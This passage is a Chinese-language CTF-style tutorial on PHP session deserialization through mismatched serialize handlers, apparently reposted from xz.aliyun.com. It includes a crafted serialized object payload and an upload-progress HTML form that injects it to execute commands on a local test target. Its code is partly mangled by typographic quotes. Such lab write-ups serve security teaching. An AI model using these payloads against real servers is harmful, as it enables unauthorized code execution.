8var_dump( $_SESSION);
9echo“</pre>”;
比如这里我get进去一个值为abc,查看一下各个存储格式:
php : lemon|s:3:”abc”;
php_serialize : a:1:{s:5:”lemon”;s:3:”abc”;}
php_binary : lemons:3:”abc”;
这有什么问题,其实PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的。如:使用不同引擎来处理session文件。
漏洞造成原理:
前面的前置知识没理解没关系,我们直接先看看漏洞如何造成的,这里涉及的其实是这两个处理器
//ini_set(session.serialize_handler, php);
//ini_set(“session.serialize_handler”, “php_serialize”);
当php_serialize处理器处理接收session,php处理器处理session时便会造成反序列化的可利用,因为php处理器是有一个|间隔符,当php_serialize处理器传入时在序列化字符串前加上|,|O:7:”xiaoxin”:1:{s:4:”name”;s:7:”xiaoxin”;}”
此时session值为a:1:{s:7:”session”;s:44:”|O:7:”xiaoxin:1:{s:4:”name”;s:7:”xiaoxin”;}”;}当php处理器处理时,会把|当作间隔符,取出后面的值去反序列化,即是我们构造的payload:|O:7:”xiaoxin:1:{s:4:”name”;s:7:”xiaoxin”;}”
简单实例
这里拿个简单的实例代码来加深理解
定义一个session.php用于接收session
这两个文件作用很清晰,他们的php处理器不一样,session.php用于接收get请求的session值,class.php反序列前会输出“未反序列化”,反序列化后会输出name值,这里我们构造|加序列化字符使class输出name值,则说明反序列化成功
先访问session.php,看看自动获取的session
构造payload
获得payload:|O:7:”Xiaoxin”:1:{s:4:”name”;s:18:”反序列化成功”;}
在session.php访问并传入参数,在session文件里面可以看到session值已改变
直接访问class.php,就会成功执行反序列化漏洞
不过这只是简单的一个示例,没有考虑到如何控制session的问题,下面找一道ctf题深入学习一下。
Jarvis OJ——PHPINFO
题目找不到了,本地复现一下,可能和题目有点不一样,环境有问题没执行成功,帮助理解就好了
upload_process机制:
实战中没有$_SESSION变量赋值时,在PHP中还存在一个upload_process机制,即自动在$_SESSION中创建一个键值对,值中刚好存在用户可控的部分,可以看下官方描述的,这个功能在文件上传的过程中利用session实时返回上传的进度。在session.upload_process.enabled开启时会启用这个功能,在php.ini中会默认启用这个功能。
利用方法:
本地搭建一个表单提交的html文件,上传文件时,如果 POST 一个名为 PHP_SESSION_UPLOAD_PROGRESS 的变量,就可以将 filename 的值赋值到session 中,filename 的值如果包含双引号,还需要进行转义,最后 Session 就会保存上传的文件名。如果没有提供写入 Session 的地方,可以用这种方法。具体利用看下面构造poc
源码:
看到ini_set(session.serialize_handler,php);我们就可以猜测这道题应该是考php的session反序列化
当我们随便传入一个值时,便会触发__construct魔法函数,从而出现phpinfo页面,我们便可以在phpinfo收集信息
漏洞产生原理:这里可以看到默认处理器(序列化处)是php_serialize,但是题目index.php处(也就是反序列化处)使用的是php处理器,经过前面的简单示例可以知道这里因为session的序列化和反序列化的处理器不同,会导致反序列化漏洞,但是这里没有可以控制session的参数,所以我们可以利用upload_process机制写入session后自动反序列化即会返回命令执行的结果
这里的参数session.upload_progress.enabled为on,所以可以使用php的upload_process机制,可以通过上传文件,从而在session文件中写入数据
构造序列化payload:
1<?php
2ini_set( session.serialize_handler, php_serialize);
3session_start;
4classOowoO
5{
6public$mdzz= print_r(scandir(dirname(__FILE__)));;
7}
8$obj = newOowoO;
9echoserialize($obj);
10?>
生成payload:O:5:”OowoO”:1:{s:4:”mdzz”;s:36:”print_r(scandir(dirname(FILE)));”;}
为防止双引号被转义,在双引号前加上\,除此之外还要加上|
|O:5:\”OowoO\”:1:{s:4:\”mdzz\”;s:36:\”print_r(scandir(dirname(FILE)));\”;}
构造poc:
(本地搭建个提交表单,地址记得改一下)
1<form action= “http://127.0.0.1/php_serialize/index.php”method= “POST”enctype= “multipart/form-data”>
2< inputtype= “hidden”name= “PHP_SESSION_UPLOAD_PROGRESS”value= “123”/>
3< inputtype= “file”name= “file”/>
4< inputtype= “submit”/>
5</form>
抓包
修改filename和Content-Type
这样子构造数据包查看返回包就能看到反序列化后的内容,这里引用文章的图片,本地搭建没复现成功,文章链接在文末
可以看到反序列化成功,命令执行成功,接下来拿flag的步骤我就省略了,本地搭建没flag。
参考文章:
https://xz.aliyun.com/t/6640#toc-10
https://xz.aliyun.com/t/7366
END
文:小新07
原文链接:https://xz.aliyun.com/t/12507#toc-9
版权声明:著作权归作者所有。如有侵权请联系删除
网安训练营
环境搭建
Python
学员专辑
信息收集
CNVD
安全求职
渗透实战
CVE
高薪揭秘
渗透测试工具
网络安全行业
神秘大礼包
基础教程
我们贴心备至
用户答疑
QQ在线客服
加入社群
QQ+微信等着你
我就知道你“在看”返回搜狐,查看更多
责任编辑:
暂无评论内容